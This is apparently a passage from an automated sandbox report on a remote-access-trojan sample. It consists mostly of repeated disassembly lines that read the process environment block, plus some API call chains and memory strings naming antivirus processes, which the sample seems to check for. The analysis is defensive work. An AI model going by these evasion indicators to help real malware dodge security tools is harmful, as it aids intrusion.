                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AECEE mov ecx, dword ptr fs:[00000030h]0_2_022AECEE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0CFF mov eax, dword ptr fs:[00000030h]0_2_022E0CFF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C8CFE mov eax, dword ptr fs:[00000030h]0_2_022C8CFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C8CFE mov ecx, dword ptr fs:[00000030h]0_2_022C8CFE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFCCF mov eax, dword ptr fs:[00000030h]0_2_022DFCCF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DFCCF mov eax, dword ptr fs:[00000030h]0_2_022DFCCF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCCC8 mov eax, dword ptr fs:[00000030h]0_2_022DCCC8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DCCC8 mov eax, dword ptr fs:[00000030h]0_2_022DCCC8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABD5C mov eax, dword ptr fs:[00000030h]0_2_022ABD5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022ABD5C mov eax, dword ptr fs:[00000030h]0_2_022ABD5C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1DB1 mov eax, dword ptr fs:[00000030h]0_2_022B1DB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1DB1 mov eax, dword ptr fs:[00000030h]0_2_022B1DB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1DB1 mov eax, dword ptr fs:[00000030h]0_2_022B1DB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B1DB1 mov eax, dword ptr fs:[00000030h]0_2_022B1DB1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228CDCA mov eax, dword ptr fs:[00000030h]0_2_0228CDCA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228CDCA mov eax, dword ptr fs:[00000030h]0_2_0228CDCA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0DCC mov eax, dword ptr fs:[00000030h]0_2_022E0DCC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0DCC mov eax, dword ptr fs:[00000030h]0_2_022E0DCC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022E0DCC mov eax, dword ptr fs:[00000030h]0_2_022E0DCC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BEDCE mov eax, dword ptr fs:[00000030h]0_2_022BEDCE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov ecx, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D7 mov eax, dword ptr fs:[00000030h]0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov ecx, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov ecx, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov ecx, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov ecx, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02492657 mov eax, dword ptr fs:[00000030h]0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A709 mov eax, dword ptr fs:[00000030h]0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC mov eax, dword ptr fs:[00000030h]0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247ABBD mov eax, dword ptr fs:[00000030h]0_2_0247ABBD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247AD51 mov eax, dword ptr fs:[00000030h]0_2_0247AD51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02474267 mov eax, dword ptr fs:[00000030h]0_2_02474267
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252B276 mov eax, dword ptr fs:[00000030h]0_2_0252B276
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252B276 mov eax, dword ptr fs:[00000030h]0_2_0252B276
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252B276 mov eax, dword ptr fs:[00000030h]0_2_0252B276
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247326C mov eax, dword ptr fs:[00000030h]0_2_0247326C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247326C mov eax, dword ptr fs:[00000030h]0_2_0247326C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247326C mov eax, dword ptr fs:[00000030h]0_2_0247326C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247326C mov eax, dword ptr fs:[00000030h]0_2_0247326C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247326C mov eax, dword ptr fs:[00000030h]0_2_0247326C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024FF272 mov eax, dword ptr fs:[00000030h]0_2_024FF272
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024FF272 mov eax, dword ptr fs:[00000030h]0_2_024FF272
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024FF272 mov eax, dword ptr fs:[00000030h]0_2_024FF272
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024AD213 mov eax, dword ptr fs:[00000030h]0_2_024AD213
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_02479237 mov eax, dword ptr fs:[00000030h]0_2_02479237
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024F8237 mov ecx, dword ptr fs:[00000030h]0_2_024F8237
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040EABD GetProcessHeap,RtlAllocateHeap,memcpy,0_2_0040EABD
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10001667 SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,GetLastError,SetupDiGetDeviceRegistryPropertyA,SetupDiGetDeviceRegistryPropertyA,GetLastError,GetLastError,GetLastError,LocalFree,GetLastError,_strcmpi,SetupDiSetClassInstallParamsA,GetLastError,SetupDiCallClassInstaller,GetLastError,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,0_2_10001667
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00410252 GetLocalTime,lstrlen,0_2_00410252
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_004110C1 RegisterServiceCtrlHandlerA,Sleep,GetVersionExA,Sleep,GetModuleFileNameA,wsprintfA,CloseHandle,exit,Sleep,Sleep,Sleep,0_2_004110C1
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: vsserv.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: avcenter.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: kxetray.exe
